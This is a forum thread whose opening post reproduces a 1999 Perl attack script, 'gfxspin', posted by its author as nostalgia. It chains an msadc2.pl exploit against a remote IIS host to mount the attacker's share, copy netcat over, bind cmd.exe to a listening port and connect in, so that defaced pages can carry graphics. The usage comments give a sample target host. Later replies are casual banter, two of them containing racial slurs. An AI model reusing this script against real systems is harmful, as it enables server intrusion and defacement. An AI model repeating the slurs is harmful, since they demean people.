ahh history

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ytcracker
    stc is the greatest
    • Dec 2002
    • 12403

    #1

    ahh history

    #!/usr/bin/perl
    # [msadc2.pl GFX spin perl script]
    # by ytcracker/[email protected]
    #
    # [being description]
    # for all the script kiddiez out there who want gfx on their
    # hax0red pages in win 9x/NT. msadc oenz you in the 9d9.
    # requires msadc2.pl.
    # [end description]
    #
    # [begin usage]
    # first off, you need to enable sharing on your win 9x/NT box.
    # select a folder and copy your html and graphics into it.
    # share the folder with the name "share". mount it read only.
    # copy nc.exe into the shared folder.
    #
    # perl gfxspin.pl [remote host] [local ip] [cmd port]
    # i.e. perl gfxspin.pl www.felons.org 132.7.34.223 8500
    #
    # opens a command shell on port 8500, sharing the drive as y:
    # on the remote system. you may need to turn on local echo for
    # windows telnet if you haven't already.
    #
    # IMPORTANT: be sure that at the end of your session you type
    # "net use y: /DELETE /YES" to unmount the share from the target box.
    # [end usage]


    if (!($ARGV[0])) {
    print "[gfxspin by ytcracker]\n";
    print "usage: gfxspin.pl [remote host] [local ip] [cmd port]\n";
    exit;
    }

    if (!($ARGV[1])) {
    print "[gfxspin by ytcracker]\n";
    print "usage: gfxspin.pl $ARGV[0] [local ip] [cmd port]\n";
    exit;
    }

    if (!($ARGV[2])) {
    print "[gfxspin by ytcracker]\n";
    print "usage: gfxspin.pl $ARGV[0] $ARGV[1] [cmd port]\n";
    exit;
    }

    open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
    print TRGET "net use y: \\\\$ARGV[1]\\share /YES\n";
    close TRGET;

    sleep 5;

    open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
    print TRGET "copy y:\\nc.exe \n";
    close TRGET;

    sleep 20;

    open(TRGET, "| perl msadc2.pl -h $ARGV[0]");
    print TRGET "nc -l -p $ARGV[2] -e cmd.exe\n";
    close TRGET;

    system("telnet $ARGV[0] $ARGV[2]");

    #EOF [ytcracker labs 1999]
    www.ytcracker.com | www.digitalgangster.com
    i love you
  • BlueQuartz
    Confirmed User
    • May 2004
    • 1971

    #2

    Comment

    • Nismo
      Confirmed User
      • May 2002
      • 4977

      #3
      msadc2.pl & unicode.pl ... ahhh. :/
      i buy massive xxx dating traffic.

      Comment

      • brand0n
        been very busy
        • Nov 2002
        • 26983

        #4
        10 print "i am elite"
        20 goto 10
        want to buy this spot for cheap? it is of course for sale. long term deals are always the best bet. brand0n/ at/ a o l dot commies.

        Comment

        • flashfire
          ICQ 1 6 7 8 5 3 4 9 2
          • Feb 2003
          • 13098

          #5
          glad I dont have to code like that anymore

          Comment

          • pxxx
            First African GFY Member
            • Mar 2004
            • 12114

            #6
            That look like it is hard to understand.

            Comment

            • Hairetsu
              Confirmed User
              • Jul 2003
              • 541

              #7
              :-0 sups nigra

              Comment

              • Screaming
                I can change this!!!!!
                • Feb 2004
                • 18972

                #8
                Felons.org? whats that?

                Comment

                • nofx
                  Too lazy to set a custom title
                  • Nov 2002
                  • 16826

                  #9
                  yer such a digital gangster ;]

                  Often times I wonder why
                  There's love and hate, theres live or die.
                  When sickness comes I must decide:
                  When feelings go, theres suicide.

                  Comment

                  • Hairetsu
                    Confirmed User
                    • Jul 2003
                    • 541

                    #10
                    nofx is the niggra of the hax0r n4710n

                    Comment

                    • See Cig
                      Confirmed User
                      • Jan 2005
                      • 515

                      #11
                      dunno wtf any of that shit means
                      See Sig

                      Comment

                      • Pornopat
                        AdultTubeSubmits.com
                        • Dec 2003
                        • 10598

                        #12
                        Originally posted by brand0n
                        10 print "i am elite"
                        20 goto 10
                        Basic....those were the days on my msx 1....
                        https://stripcash.com/sign-up/?userI...fff832eb95ab6a

                        Comment

                        • wargames
                          Kliris
                          • May 2003
                          • 10423

                          #13
                          Get your point.
                          ICQ 212-115-582
                          Email Steve at Vas Media Group .com

                          Comment

                          Working...